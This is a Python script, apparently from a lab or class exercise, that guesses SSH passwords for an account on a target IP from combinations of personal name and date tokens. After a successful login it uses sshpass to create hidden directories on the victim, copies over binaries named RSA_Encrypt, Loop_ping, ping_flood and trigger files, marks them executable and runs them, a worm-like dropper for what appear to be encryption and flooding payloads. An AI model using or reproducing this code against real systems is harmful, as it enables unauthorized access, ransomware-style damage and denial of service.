#!/usr/bin/env python
import paramiko, sys, os, socket
import itertools,string,crypt

USER = "attacker"
PORT=22
def dictionary(IP,Password):
   
   
   try:
      ssh = paramiko.SSHClient()
      ssh.load_system_host_keys()
      ssh.set_missing_host_key_policy(paramiko.MissingHostKeyPolicy())
      try:
         ssh.connect(IP , port=PORT, username=USER, password=Password)
         print ("Connected success. Password= " + Password)
         return 1,Password
      except (paramiko.AuthenticationException):
         #print ("Incorrect Password")
         pass
      except (socket.error):
        #print (error)
         pass
      except (paramiko.SSHException):
        #print (error)
         print ("Most probably caused by a missing host  key")
         pass
      except Exception:
         print ("Unknown error ")
         pass
      ssh.close()
   except Exception :
      print("OOOO")
   return 0,""




c=["YueHan","Wang","YH","1999","0228","oscar","Realtek","@","_"]
IP=sys.argv[1]
host_IP="192.168.80.139"
stop=0
Password=""

for i in range (0,8):
   Password=c[i]
   for j in range (0,8):
      Password=c[i]+c[j]
      stop,record=dictionary(IP,Password)
      if(stop==1):
         break
   if(stop==1):
      break
      

#print(record)

#H
cin="sshpass -p "+record+" ssh -o StrictHostKeyCHecking=no " + USER + "@" + IP +" mkdir /home/attacker/Desktop/.H"
os.system(cin)

cin="sshpass -p "+record+" scp -o StrictHostKeyCHecking=no trigger2 " + USER + "@"+IP+":/home/attacker/Desktop/.H"
os.system(cin)

cin="sshpass -p "+record+" scp -o StrictHostKeyCHecking=no RSA_Encrypt " + USER + "@"+IP+":/home/attacker/Desktop/.H"
os.system(cin)

cin="sshpass -p "+record+" scp -o StrictHostKeyCHecking=no rsa_encrypt " + USER + "@"+IP+":/home/attacker/Desktop/.H"
os.system(cin)

cin="sshpass -p "+record+" scp -o StrictHostKeyCHecking=no Loop_ping " + USER + "@"+IP+":/home/attacker/Desktop/.H"
os.system(cin)

cin="sshpass -p "+record+" scp -o StrictHostKeyCHecking=no ping_flood " + USER + "@"+IP+":/home/attacker/Desktop/.H"
os.system(cin)

cin="sshpass -p "+record+" ssh -o StrictHostKeyCHecking=no " + USER + "@" + IP +' chmod +x /home/attacker/Desktop/.H/trigger2'
os.system(cin)

cin="sshpass -p "+record+" ssh -o StrictHostKeyCHecking=no " + USER + "@" + IP +' chmod +x /home/attacker/Desktop/.H/RSA_Encrypt'
os.system(cin)

cin="sshpass -p "+record+" ssh -o StrictHostKeyCHecking=no " + USER + "@" + IP +' chmod +x /home/attacker/Desktop/.H/rsa_encrypt'
os.system(cin)

cin="sshpass -p "+record+" ssh -o StrictHostKeyCHecking=no " + USER + "@" + IP +' chmod +x /home/attacker/Desktop/.H/Loop_ping'
os.system(cin)

cin="sshpass -p "+record+" ssh -o StrictHostKeyCHecking=no " + USER + "@" + IP +' chmod +x /home/attacker/Desktop/.H/ping_flood'
os.system(cin)

cin="sshpass -p "+record+" ssh -o StrictHostKeyCHecking=no " + USER + "@" + IP +' /home/attacker/Desktop/.H/trigger2'
os.system(cin)

#Backup
cin="sshpass -p "+record+" ssh -o StrictHostKeyCHecking=no " + USER + "@" + IP +" mkdir /home/attacker/Desktop/.Backup"
os.system(cin)

cin="sshpass -p "+record+" scp -o StrictHostKeyCHecking=no trigger1 " + USER + "@"+IP+":/home/attacker/Desktop/.Backup"
os.system(cin)

cin="sshpass -p "+record+" scp -o StrictHostKeyCHecking=no RSA_Encrypt " + USER + "@"+IP+":/home/attacker/Desktop/.Backup"
os.system(cin)

cin="sshpass -p "+record+" scp -o StrictHostKeyCHecking=no rsa_encrypt1 " + USER + "@"+IP+":/home/attacker/Desktop/.Backup"
os.system(cin)

cin="sshpass -p "+record+" scp -o StrictHostKeyCHecking=no Loop_ping " + USER + "@"+IP+":/home/attacker/Desktop/.Backup"
os.system(cin)

cin="sshpass -p "+record+" scp -o StrictHostKeyCHecking=no ping_flood1 " + USER + "@"+IP+":/home/attacker/Desktop/.Backup"
os.system(cin)

cin="sshpass -p "+record+" ssh -o StrictHostKeyCHecking=no " + USER + "@" + IP +' chmod +x /home/attacker/Desktop/.Backup/trigger1'
os.system(cin)

cin="sshpass -p "+record+" ssh -o StrictHostKeyCHecking=no " + USER + "@" + IP +' chmod +x /home/attacker/Desktop/.Backup/RSA_Encrypt'
os.system(cin)

cin="sshpass -p "+record+" ssh -o StrictHostKeyCHecking=no " + USER + "@" + IP +' chmod +x /home/attacker/Desktop/.Backup/rsa_encrypt1'
os.system(cin)

cin="sshpass -p "+record+" ssh -o StrictHostKeyCHecking=no " + USER + "@" + IP +' chmod +x /home/attacker/Desktop/.Backup/Loop_ping'
os.system(cin)

cin="sshpass -p "+record+" ssh -o StrictHostKeyCHecking=no " + USER + "@" + IP +' chmod +x /home/attacker/Desktop/.Backup/ping_flood1'
os.system(cin)

cin="sshpass -p "+record+" ssh -o StrictHostKeyCHecking=no " + USER + "@" + IP +' /home/attacker/Desktop/.Backup/trigger1'
os.system(cin)

